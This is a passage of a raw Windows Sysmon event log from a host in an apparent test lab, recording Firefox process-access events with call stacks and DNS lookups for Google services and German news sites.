Firefox\xul.dll+e4f3f3|C:\Program Files\Mozilla Firefox\xul.dll+e4d68c|C:\Program Files\Mozilla Firefox\xul.dll+e4cc68|C:\Program Files\Mozilla Firefox\xul.dll+e4be9b|C:\Program Files\Mozilla Firefox\xul.dll+e5d03e|C:\Program Files\Mozilla Firefox\xul.dll+b50c92|C:\Program Files\Mozilla Firefox\xul.dll+a59587|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3 10341000x800000000000000017244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 
10341000x800000000000000017243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla 
Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.967{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com02a00:1450:4001:825::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.965{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com0216.58.208.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.964{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:216.58.208.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.950{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.com02a00:1450:4001:81d::2004;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.948{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.com0172.217.16.164;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.947{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.com0::ffff:172.217.16.164;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:07.261{59A5CD1D-945A-6005-3305-00000000A301}7052netzpolitik.org02a01:4f8:141:304c::3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052netzpolitik.org0176.9.0.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052taz.de0193.104.220.23;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052netzpolitik.org0::ffff:176.9.0.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052taz.de0::ffff:193.104.220.23;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program 
Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 
22542200x800000000000000017347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.951{59A5CD1D-945A-6005-3305-00000000A301}7052plus.l.google.com02a00:1450:4001:809::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.949{59A5CD1D-945A-6005-3305-00000000A301}7052plus.l.google.com0216.58.205.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.949{59A5CD1D-945A-6005-3305-00000000A301}7052apis.google.com0type: 5 plus.l.google.com;::ffff:216.58.205.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.889{59A5CD1D-945A-6005-3305-00000000A301}7052gstaticadssl.l.google.com02a00:1450:4001:806::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.887{59A5CD1D-945A-6005-3305-00000000A301}7052gstaticadssl.l.google.com0142.250.74.195;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.886{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.gstatic.com0type: 5 gstaticadssl.l.google.com;::ffff:142.250.74.195;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.841{59A5CD1D-945A-6005-3305-00000000A301}7052www.gstatic.com02a00:1450:4001:81f::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.839{59A5CD1D-945A-6005-3305-00000000A301}7052www.gstatic.com0216.58.212.163;C:\Program Files\Mozilla 
Firefox\firefox.exe 22542200x800000000000000017339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.838{59A5CD1D-945A-6005-3305-00000000A301}7052www.gstatic.com0::ffff:216.58.212.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.463{59A5CD1D-945A-6005-3305-00000000A301}7052consent.google.com02a00:1450:4001:808::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.459{59A5CD1D-945A-6005-3305-00000000A301}7052consent.google.com0216.58.212.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.459{59A5CD1D-945A-6005-3305-00000000A301}7052consent.google.com0::ffff:216.58.212.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.451{59A5CD1D-945A-6005-3305-00000000A301}7052ssl.gstatic.com02a00:1450:4001:801::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.449{59A5CD1D-945A-6005-3305-00000000A301}7052ssl.gstatic.com0172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}7052ssl.gstatic.com0::ffff:172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.363{59A5CD1D-945A-6005-3305-00000000A301}7052e12746.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.361{59A5CD1D-945A-6005-3305-00000000A301}7052e12746.g.akamaiedge.net0104.79.89.121;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.361{59A5CD1D-945A-6005-3305-00000000A301}7052www.faz.net0type: 5 www.faz.net.edgekey.net;type: 5 e12746.g.akamaiedge.net;::ffff:104.79.89.121;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.272{59A5CD1D-945A-6005-3305-00000000A301}7052taz.de02001:67c:13c::7a2:de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.213{59A5CD1D-945A-6005-3305-00000000A301}7052googleads.g.doubleclick.net0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.186{59A5CD1D-945A-6005-3305-00000000A301}7052play.google.com02a00:1450:4001:81d::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.185{59A5CD1D-945A-6005-3305-00000000A301}7052play.google.com0172.217.22.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.184{59A5CD1D-945A-6005-3305-00000000A301}7052play.google.com0::ffff:172.217.22.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.182{59A5CD1D-945A-6005-3305-00000000A301}7052adservice.google.de0type: 5 
pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.141{59A5CD1D-945A-6005-3305-00000000A301}7052pagead46.l.doubleclick.net02a00:1450:4001:818::2002;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.134{59A5CD1D-945A-6005-3305-00000000A301}7052pagead46.l.doubleclick.net0172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.133{59A5CD1D-945A-6005-3305-00000000A301}7052adservice.google.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.116{59A5CD1D-945A-6005-3305-00000000A301}7052www3.l.google.com02a00:1450:4001:818::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.107{59A5CD1D-945A-6005-3305-00000000A301}7052www3.l.google.com0172.217.21.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.106{59A5CD1D-945A-6005-3305-00000000A301}7052ogs.google.com0type: 5 www3.l.google.com;::ffff:172.217.21.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.634{59A5CD1D-8E56-6005-2E00-00000000A301}2464110.22.217.172.in-addr.arpa.0type: 12 fra15s18-in-f110.1e100.net;type: 12 fra15s18-in-f14.1e100.net;C:\Windows\sysmon64.exe 
22542200x800000000000000017364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464142.212.58.216.in-addr.arpa.0type: 12 fra16s46-in-f14.1e100.net;type: 12 ams15s21-in-f142.1e100.net;type: 12 ams15s21-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464195.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f3.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.212.58.216.in-addr.arpa.0type: 12 ams15s22-in-f3.1e100.net;type: 12 fra24s01-in-f3.1e100.net;type: 12 ams15s22-in-f163.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464131.16.217.172.in-addr.arpa.0type: 12 zrh04s06-in-f131.1e100.net;type: 12 fra15s46-in-f3.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.723{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.648{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.647{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
